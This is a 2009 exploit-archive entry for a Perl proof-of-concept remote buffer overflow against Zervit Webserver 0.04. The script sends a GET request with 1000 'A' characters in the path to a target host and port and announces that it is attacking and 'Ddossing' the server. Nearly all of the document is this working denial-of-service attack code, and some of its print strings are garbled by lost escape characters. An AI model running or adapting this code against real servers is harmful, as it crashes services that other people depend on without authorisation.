[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Zervit Webserver 0.04 (GET Request) Remote Buffer Overflow PoC
# Published : 2009-05-18
# Author : Stack
# Previous Title : OpenSSL <= 0.9.8k, 1.0.0-beta2 DTLS Remote Memory Exhaustion DoS
# Next Title : MixSense 1.0.0.1 DJ Studio (.mp3 file) Crash Exploit
#!/usr/bin/perl
# Zervit webserver 0.4 Bof Poc
# make it just for fun :s
use LWP::Simple;
use LWP::UserAgent;
if (@ARGV < 2) {
print("Usage: $0 <url> <port>n");
print("TARGETS aren ");
print("Example: perl $0 127.0.0.1 777 n");
exit(1);
}
($target, $port) = @ARGV;
print("Zervit Webserver 0.04 bof xpl : Coded by Stack!n");
print("Attacking $target on port $port!n");
print("Ddossing .......n");
$dos ="x41" x 1000 ;
$temp="/" x 2;
my $url= "http://". $target. ":" . $port .$temp . $dos;
$content=get $url;
print("n Server Bofed");
# www.Syue.com [2009-05-18]